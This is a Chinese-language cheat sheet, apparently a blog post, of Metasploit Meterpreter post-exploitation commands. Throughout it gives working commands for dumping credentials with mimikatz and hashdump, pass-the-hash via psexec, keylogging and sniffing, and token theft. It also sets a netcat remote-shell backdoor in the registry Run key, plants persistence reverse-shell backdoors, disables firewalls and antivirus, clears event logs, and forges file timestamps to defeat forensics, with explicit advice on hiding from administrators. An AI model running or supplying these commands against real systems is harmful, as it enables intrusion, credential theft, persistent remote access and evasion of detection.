Meterpreter重要命令与使用

admin管理员组

文章数量:1661632

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力，本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。

文章目录

• • 0x01.系统命令
  • 0x02.文件系统命令
  • 0x03.网络命令
  • 0x04.敏感信息收集
  • 0x05.@提权@
  • • 小插曲值UAC绕过
  • 0x06.mimikatz抓取密码
  • 0x07.远程桌面&截屏
  • 0x08.开启rdp(远程桌面)&添加用户
  • 0x09.键盘记录
  • 0x10.@sniffer抓包@
  • 0x11.注册表操作
  • 0x12.盗取令牌
  • 0x13.哈希利用
  • @0x14.后门植入@
  • **关闭防火墙和杀软**
  • 0x15.扫描脚本
  • 0X16.各种脚本
  • @绑定进程@
  • 基于MACE时间的反电子取证
  • 一些常用的破解模块(就是各种..._login)
  • 一些好用的模块

0x01.系统命令

1.基本系统命令

sessions    #sessions -h 查看帮助
sessions -i <ID值>    #进入回话  -k杀死会话
background    #将当前会话至于后台
run         #执行已有模块或脚本，输入run后按两下tab键，列出已有的脚本
info <...>      #查看已有模块信息
grtuid         #查看权限
getpid          #查看当前进程的pid
sysinfo         #查看目标机系统信息
ps              #查看当前活跃进程
idletime        #查看目标机闲置时间，显示目标机器截止到当前无操作命令的时间
reboot/shutdown          #重启/关机
shell            #进入目标机cmd shell（如果出错，考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再尝试）
load/use         #加载模块

2.uictl开关键盘/鼠标

uictl [enable/disable] [keyboard/mouse/all]    #开启/禁用键盘或鼠标
uictl disable mouse    #禁用鼠标
uictl disable keyboard     #禁用键盘

3.webcam摄像头命令

webcam_chat　　　#查看摄像头接口
webcam_list              #查看摄像头
webcam_snap              #开启摄像头拍照
webcam_stream            #开启摄像头视频
record_mic　　　 #音频录制

4.execute执行文件

execute         #在目标机中执行文件
execute -H -i -f cmd.exe     创建新锦成cmd.exe,   -H不可见，-i交互  -f为执行要运行的
参数：
-H：创建一个隐藏进程
-a：传递给命令的参数
-i：跟进程进行交互
-m：从内存中执行
-t：使用当前伪造的线程令牌运行进程
-s：在给定会话中执行进程
-f 执行的程序文件
-d 在目标主机执行时显示的进程名称（用以伪装）
-o wce.txt是wce.exe的运行参数

这达到的效果就跟使用shell命令一样了。

我们运行一下目标主机上的记事本程序

execute -f notepad.exe

目标主机上立马弹出来一个记事本程序，如下图：

这样太明显，如果希望隐藏后台执行，加参数-H

execute -H -f notepad.exe

此时目标主机桌面没反应，但我们在meterpreter会话上使用ps命令看到了

@再来一个，在目标主机内存中(-m)直接执行我们攻击主机上的攻击程序，比如wce.exe，又比如木马等，这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀。@

execute -H -m -d notepad.exe -f wce.exe -a "-o wce.txt"
-d 在目标主机执行时显示的进程名称（用以伪装）
-m 直接从内存中执行
"-o wce.txt"是wce.exe的运行参数
-f为执行要运行的

5.migrate进程迁移

getpid    # 获取当前进程的pid
getprivs         #尽可能获取尽可能多的特权
ps   # 查看当前活跃进程
migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中,需要注意的是如果存在杀软的话可能会阻止进程注入，所以把会话进程注入到svchost.exe是一个好方法
kill <pid值>   #杀死进程

使用“getuid”获得当前的权限，migrate+PID迁移进程（当我们攻击一个系统是，常常是对像是IE之类的服务漏洞进行利用的，可是不免有对方关闭IE的情况，那么我们的meterpreter会话将会关闭，从而导致与目标系统失去连接，所以我们可以使用迁移进程后的攻击模块，将sessions迁移到内存空间中的其他稳定的、不会被关闭的服务进程中，以维持稳定的系统控制），从列表中看到PID为500的是administrator权限，所以是迁移到administrator的权限，再升级为权限SYSTEM账户。

列出远程机器的进程和进程ID方便迁移我们的进程，进而改变我们的权限。使用“ps”命令。

在得到的进程列表后，可以实现迁移进程，用getpid查看当前进程号，然后根据上图既可以知道当前的权限，若再用migrate+pid，就会迁移到另一个进程中，然后我们的权限就改变了。

6.clearav清除日志

clearav / clearev       #清除Windows中的应用程序日志，系统日志，安全日志 / 清除事件日志

完成攻击操作之后，千万别忘了“打扫战场”。我们的所有操作都会被记录在目标系统的日志文件之中，因此我们需要在完成攻击之后使用命令来清除事件日志。

0x02.文件系统命令

1.基本文件系统命令

getwd 或者pwd     #查看当前工作目录
ls
cd
search -f *pass* （<目录>）   #搜索文件  -h查看帮助   search -f sea*.bat c:\\xamp\\
cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容
upload /tmp/hack.txt C:\\lltest    #上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/    #下载文件到本机上
edit c:\\1.txt         #编辑或创建文件  没有的话，会新建文件
rm C:\\lltest\\hack.txt    #删除文件
del c:\boot.ini      #删除指定的文件
mkdir lltest2          #在受害者系统上的创建目录
rmdir lltest2          #受害者系统上删除目录
getlwd 或者lpwd        #操作攻击者主机 查看当前目录
lcd /tmp          #操作攻击者主机 切换目录
dir               #列出目标主机的文件和文件夹信息

2.timestomp伪造时间戳

timestomp C:// -h   #查看帮助
timestomp -v C://2.txt   #查看时间戳，查看当前目标文件 MACE 时间。
timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt
timestomp c:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建（create）时间

0x03.网络命令

1.基本网络命令

ipconfig/ifconfig
netstat -ano
arp
getproxy    #查看代理
route       #查看路由

2.portfwd端口转发

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
# 3368 Server远程桌面的服务端口
执行之后所有端口3389的内网流量都会通过这个meterpreter的会话来转发到你kali的127.0.0.1的指定端口上 在这里我设置的监听端口为6666
然后开始连接远程桌面。新建一个终端窗口。
执行连接Windows远程桌面的命令
rdesktop 127.1.1.0:6666  （可指定-u 用户 -p 密码）
连接后会出现登录窗口
利用我们前面mimikatz读到的账户密码即可进入

3.autoroute添加路由

run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

然后可以利用arp_scanner、portscan等进行扫描

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

4.Socks4a代理@

autoroute添加完路由后，还可以利用msf自带的sock4a模块进行Socks4a代理

msf> use auxiliary/server/socks4a 
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run

然后

vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080

最后proxychains 使用Socks4a代理访问

0x04.敏感信息收集

信息收集的脚本位于：

/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather

用run执行脚本

信息收集的脚本较多，仅列几个常用的：

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看磁盘分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控
run post/windows/gather/enum_logged_on_users   # 检查用户是否成功登录
run scraper                      #获取常见信息，保存在～/.msf4/logs/scripts/scraper/目录下
run post/windows/gather/dumplinks    # 获取目标主机上最近访问过的文档、链接信息

(1) post/windows/gather/enum_application模块获取目标主机上的软件安装信息

命令：run post/windows/gather/enum_applications

效果如图：

(2) post/windows/gather/enum_ie后渗透模块，读取目标主机IE浏览器cookies等缓存信息，嗅探目标主机登录过的各类账号密码

命令：run post/windows/gather/enum_ie

效果如下图：

获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/root/.msf5/loot/目录下,这里说IE7以上才有效

0x05.@提权@

1.getsystem提权

getsystem   #通过各种攻击向量将一个管理帐户（通常为本地Administrator账户）提升为本地SYSTEM帐户
getsystem –h  #升级权限SYSTEM账户

getsystem工作原理：
① getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。
② getsystem产生一个进程，它创建一个命名管道并等待来自该服务的连接。
③ Windows服务已启动，导致与命名管道建立连接。
④ 该进程接收连接并调用ImpersonateNamedPipeClient，从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe，并且我们有一个SYSTEM特权进程。

小插曲值UAC绕过

本人在提权的过程中报错了，

这表示我们收到了UAC用户账号控制的拦截，可以用exploit/windows/local/ask模块绕过：

这样就得到目标机的system权限。

**2.bypassuac ** #绕过uac

内置多个bypassuac脚本，原理有所不同，使用方法类似，运行后返回一个新的会话，需要再执行getsystem获取系统权限，如：

use exploit/windows/local/bypassuac    
use exploit/windows/local/bypassuac_injection     
use exploit/windows/local/bypassuac_vbs   
use exploit/windows/local/ask   #绕过uac

如使用bypassuac.rb脚本：

meterpreter > background
msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run

3.@内核漏洞提权@
可先利用enum_patches模块 收集补丁信息，然后查找可用的exploits进行提权

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit

4.偷取令牌提权

另一个提权的方法是扮演一个帐户从一个特定进程偷取令牌。为此，我们需要“incognito”扩展，使用“steal_token+PID”。这个例子中我们使用的是steal_token 640，其中由前面执行ps后得到的信息可知，PID为640的权限为administrator，所以我们在执行命令后虽然提示错误信息，但是它仍会被成功在后台执行，所以在运行steal_token后核实UID，我们的权限就变为了administrator了。

0x06.mimikatz抓取密码

load mimikatz    #help mimikatz 查看帮助
msv (获取 hash 值)
ssp （获取明文信息）
kerberos #获取明文
wdigest  #获取Wdigest密码，获取系统账户信息
mimikatz_command -f samdump::hashes  #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords

0x07.远程桌面&截屏

enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接

我们通过桌面的信息可以知道一些对我们入侵有帮助的信息，比如对方的杀毒软件的类型等等。

0x08.开启rdp(远程桌面)&添加用户

1.getuid命令

run getuid -h     #查看帮助
run getuid -e     #开启远程桌面
run getuid -u testuser -p 123456     #再添加用户
run getgui -f 6661 –e   #3389端口转发到6661
# getgui 系统不推荐，推荐使用run post/windows/manage/enable_rdp
# getgui添加用户时，有时虽然可以成功添加用户，但是没有权限通过远程桌面登陆
add_user username password -h ip    #在远程目标主机上添加一个用户
add_group_user "Domain Admins" username -h ip    #将用户添加到目标主机的域管理员组中

开启目标主机的远程桌面服务后，可以添加账号以便利用，如下：

添加完账户之后使用rdesktop命令连接一下远程主机，

rdesktop -u kali -p meterpreter 192.168.250.176:3389

执行命令之后就会弹出一个窗口，只需再输入一次密码就可以进入目标机器，并对目标机器直接进行控制。

2.enable_rdp脚本

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662
# 脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
# 通过enable_rdp.rb脚本可知：开启rdp是通过reg修改注册表；添加用户是调用cmd.exe 通过net  user添加；端口转发是利用的portfwd命令

0x09.键盘记录

keyscan_start    #开始键盘记录
keyscan_dump     #导出记录数据
keyscan_stop     #结束键盘记录

0x10.@sniffer抓包@

use sniffer
sniffer_interfaces   #查看网卡
sniffer_start 2   #选择网卡 开始抓包
sniffer_stats 2   #查看状态
sniffer_dump 2 /tmp/lltest.pcap  #导出pcap数据包
sniffer_stop 2   #停止抓包

0x11.注册表操作

1.注册表基本命令

reg –h
    -d   注册表中值的数据.    -k   注册表键路径    -v   注册表键名称
    enumkey 枚举可获得的键    setval 设置键值    queryval 查询键值数据
reg command   # 在目标主机注册表中进行交互，创建，删除，查询等操作

2.@注册表设置nc后门@

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值
nc -v 192.168.1.3 443  #攻击者连接nc后门

0x12.盗取令牌

1.incognito假冒令牌

use incognito      #加载incoginto功能（用来盗窃目标主机的令牌或是假冒用户)
list_tokens -u    #查看可用的token，列出目标主机用户的可用令牌
list_tokens -g    列出目标主机用户组的可用令牌
impersonate_token DOMAIN_NAME\\USERNAME       # 假冒目标主机上的可用令牌,如下：
	impersonate_token 'NT AUTHORITY\SYSTEM'     #假冒SYSTEM token
或者impersonate_token NT\ AUTHORITY\\SYSTEM    #不加单引号 需使用\\
execute -f cmd.exe -i –t    # -t 使用假冒的token 执行或者直接shell
rev2self   #返回原始token

2.steal_token窃取令牌

steal_token <pid值>   #从指定进程中窃取token，先ps(盗窃给定进行的可用令牌并进行令牌假冒)
drop_token <pid值>    #删除窃取的token，停止假冒当前令牌

为此，另一个提权的方法是扮演一个帐户从一个特定进程偷取令牌。为此，我们需要“incognito”扩展，使用“steal_token+PID”。这个例子中我们使用的是steal_token 640，其中由前面执行ps后得到的信息可知，PID为640的权限为administrator，所以我们在执行命令后虽然提示错误信息，但是它仍会被成功在后台执行，所以在运行steal_token后核实UID，我们的权限就变为了administrator了。

0x13.哈希利用

使用“hashdump”命令可以从系统提取用户名和密码hashes。使用hashdump命令可以获取目标主机的SAM文件，获取目标主机的账号密码hash信息，剩下的可以用爆破软件算出明文密码，微软一般用用户名:SID:LM:NTML:NTLMv2形式的哈希表存储密码。若想运行这个命令, 需要有注册表和SAM [Security Account Manager]的系统的权限，如果你是作为一个普通的用户登陆的话，你需要提升权限,这我们将在后面提到。

1.获取哈希(hash)

run post/windows/gather/smart_hashdump  #从SAM导出密码哈希
#需要先获取SYSTEM权限

脚本和post模块都需要通过“run”命令执行，我在测试环境中运行hashdump模块后的结果如下：

数据的输出格式为：用户名：SID：LM哈希：NTLM哈希:::，所以我们得到了三个用户账号，分别为Administrator, Guest和Coen。

其中的LM哈希（aad3b435b51404eeaad3b435b51404ee）跟NTLM哈希（31d6cfe0d16ae931b73c59d7e0c089c0）对应的是一个空密码。

接下来要处理的就是用户Coen的密码（f773c5db7ddebefa4b0dae7ee8c50aea）了。虽然我们可以使用类似John the Ripper这样的工具来破解密码，但是我们直接Google这个哈希之后，就直接得到了密码明文：trustno1。

2.PSExec哈希传递(通过Hash获取权限)

通过smart_hashdump获取用户哈希后，可以利用psexec模块进行哈希传递攻击
前提条件：①开启445端口 smb服务；②开启admin$共享

msf > use exploit/windows/smb/psexec
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 443
msf > set RHOST 192.168.159.144
msf >set SMBUser Administrator
msf >set SMBPass aad3b4*****04ee:5b5f00*****c424c  # LM哈希:NTLM哈希
msf >set SMBDomain  WORKGROUP   #域用户需要设置SMBDomain
msf >exploit

@0x14.后门植入@

metasploit自带的后门有两种方式启动的，一种是通过启动项启动(persistence)，一种是通过服务启动(metsvc)，另外还可以通过persistence_exe自定义后门文件。

1.persistence启动项后门

run persistence –h  #查看帮助
run persistence -X -i 5 -p 6661 -r 192.168.161.128
#-X指定启动的方式为开机自启动，-i不断尝试反向连接的时间间隔 –r指定攻击者的ip
远程主机重启后将在特定的时间间隔保持meterpreter会话

执行结果是在C:\Users***\AppData\Local\Temp\目录下，上传了一个vbs脚本

[

我们在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 加入开机启动项

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 6661
msf > exploit

2.metsvc服务后门

metsvc后渗透攻击模块其实就是将Meterpreter以系统服务的形式安装到目标主机，它会上传三个文件：

metsvc.dll
metsvc-service.exe
metsvc.exe

执行命令：run metsvc

run metsvc –h   # 查看帮助
run metsvc –A   #自动安装后门

在C:\Users***\AppData\Local\Temp\上传了三个文件（metsrv.x86.dll、metsvc-server.exe、metsvc.exe），通过服务启动，服务名为meterpreter

连接后门

msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337     # 过程信息中有
msf > exploit

关闭防火墙和杀软

run getcountermeasure
# 显示HIPS和AV进程的列表，显示远程机器的防火墙规则，列出DEP和UAC策略

防火墙很烦人，执行命令关闭攻击主机的防火墙：netsh firewall set opmode disable，OK！

要打开对方shell再执行。（也可使用netsh adcfirewall set allprofiles state off 命令）

如果目标管理员查看防火墙配置，发现防火墙被人为关闭，那么必定引起管理员的警惕！因此，我们还可以通过策略的添加，来隐蔽我们的行为。

netsh firewall add portopening TCP 666“VMvare” ENABLE ALL

伪装成一个系统正常的进程，开启666端口进程名为VMvare，之后远程重启目标系统，并利用 NC 连接即可！

尝试关掉杀软：run killav，好像关不掉最新版QQ安全管家

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off sh.exe...
[*] Killing off sh.exe...

0x15.扫描脚本

扫描的脚本位于：

/usr/share/metasploit-framework/modules/auxiliary/scanner/

扫描的脚本较多，仅列几个代表：

use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/jboss_vulnscan
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/oracle/oracle_login

0X16.各种脚本

为获取远程机器上的信息，在meterpreter中还有很多脚本可用，做更大的渗透测试。

使用run <scriptname>来使用meterpreter模块中的脚本命令。

(1) run packetrecorder

查看目标系统的所有网络流量，并且进行数据包记录，-i 1指定记录数据包的网卡。

从下图中运行之后返回的信息中可以到我们需要查看的目标系统的网络流量信息将被存储的路径，可以到下面路径中直接查看。

(2) run get_local_subnets

得到本地子网网段

(3) run getcountermeasure

显示HIPS和AV进程的列表，显示远程机器的防火墙规则，列出DEP和UAC策略

(4) run scraper

从目标主机获得所有网络共享等信息(密码等)。

并且获得的这些所有这些信息都存储在/root/.msf4/logs/scripts/scraper directory目录下。使用ls命令查看存储的这些文件。

(5)run killav

命令终止Av进程，可以很快的清除我们的路径和有效渗透测试的记录

但是这个脚本,不能绝对得逃避杀毒软件，但是如果成功了对被攻击者会是一个严重的打击，对他造成很大的困扰。

使用了 “run killav”命令后xp会终止Av进程然后弹出窗口：

(6) run hashdump

获得密码哈希值

运行这个脚本和在meterpreter下直接运行hashdump结果差不多。

(7) run dumplinks

Link文件包含时间戳，文件位置，共享名，卷序列号，等。脚本会在用户目录和office目录中收集lnk文件

调用post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息

命令：run post/windows/gather/dumplinks

效果如下图：

(8) duplicate

再次产生payload，注入到其他进程或打开新进程并注入其中

(9) run enum_chrome

获取chrome中的信息，包括cooikie，历史纪录，书签,登录密码等。同理：enum_firefox

(10) run get_env

获取所有用户的环境变量

(11) run getgui

可以很方便的开启远程桌面服务，添加用户，端口转发功能

(12) run gettelnet

同之前开启终端桌面服务的脚本，这个是用来开启telnet的

(13)run hostsedit

操作hosts文件

(14)run win32-sshserver

安装openssh服务

(15) run winenum

会自动运行多种命令，将命令结果保存到本地

@绑定进程@

Meterpreter既可以单独运行，也可以与其他进程进行绑定。因此，我们可以让Meterpreter与类似explorer.exe这样的进程进行绑定，并以此来实现持久化。

在下面的例子中，我们会将Meterpreter跟winlogon.exe绑定，并在登录进程中捕获键盘记录。

首先，我们需要使用“ps”命令查看目标设备中运行的进程：

接下来，使用“getpid”找出需要绑定的进程，接下来，使用migrate命令+pid来绑定进程。

绑定完成之后，我们就可以开始捕获键盘数据了：

接下来，我们可以选择导出键盘记录，或者使用命令“enum_logged_on_users”来检查用户是否成功登录：

等待片刻之后，使用keyscan_dump命令导出记录信息:

捕捉到的用户密码为trustno1。

基于MACE时间的反电子取证

**小插曲：**文件四属性（MACE）

只要有人访问文件并读取其内容。文件的MACE属性立即发生变化！这对取证非常的有好处。

MACE 是：Modified-Accessed-Created-Entry 这四个单词的缩写！

Modified：修改时间

Accessed：访问时间

Created：创建时间

Entry Modified： 条目修改时间

timestomp -v secist.txt #查看当前目标文件 MACE 时间。

timestomp c:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建时间，例如修改文件的创建时间（反取证调查）

timestomp -f c:\AVScanner.ini secist.txt （将模板文件MACE时间，复制给当前secist.txt文件）

之后就是愉快的内网扫描了!haha!

一些常用的破解模块(就是各种…_login)

auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/ftp/anonymous

一些好用的模块

auxiliary/admin/realvnc_41_bypass  (Bypass VNCV4网上也有利用工具)
auxiliary/admin/cisco/cisco_secure_acs_bypass （cisco Bypass 版本5.1或者未打补丁5.2版洞略老）
auxiliary/admin/http/jboss_deploymentfilerepository （内网遇到Jboss最爱:)）
auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:)
auxiliary/admin/mssql/mssql_exec （用爆破得到的sa弱口令进行执行命令没回显:(）
auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友)
auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:)
auxiliary/admin/oracle/post_exploitation/win32exec （爆破得到Oracle弱口令来Win32命令执行）
auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)
auxiliary/scanner/rsync/modules_list  （Rsync）
auxiliary/scanner/misc/redis_server  (Redis)
auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血)
auxiliary/scanner/mongodb/mongodb_login (Mongodb)
auxiliary/scanner/elasticsearch/indices_enum (elasticsearch)
auxiliary/scanner/http/axis_local_file_include (axis本地文件包含)
auxiliary/scanner/http/http_put (http Put)
auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户)
auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户)
auxiliary/scanner/http/svn_scanner （svn Hunter :)）
auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破)
auxiliary/scanner/http/zabbix_login （Zabbix :)）

本节所涉及的windows系统程序：

• svchost.exe是微软Windows操作系统中的系统文件，微软官方对它的解释是：svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。这个程序对系统的正常运行是非常重要，而且是不能被结束的。许多服务通过注入到该程序中启动，所以会有多个该文件的进程。
• explorer.exe是Windows程序管理器或者文件资源管理器，它用于管理Windows图形壳，包括桌面和文件管理，删除该程序会导致Windows图形界面无法使用。explorer.exe也有可能是w32.Codered等病毒。该病毒通过email邮件传播，当打开病毒发送的附件时，即被感染，会在受害者机器上建立SMTP服务，允许攻击者访问你的计算机、窃取密码和个人数据。
• winlogon.exe是Windows NT 用户登陆程序，用于管理用户登录和退出。该进程的正常路径应是C:\Windows\System32，且是以 SYSTEM 用户运行，若不是以上路径且不以 SYSTEM 用户运行，则可能是 W32.Netsky.D@mm 蠕虫病毒，该病毒通过 EMail 邮件传播，当你打开病毒发送的附件时，即会被感染。

本文标签： 命令Meterpreter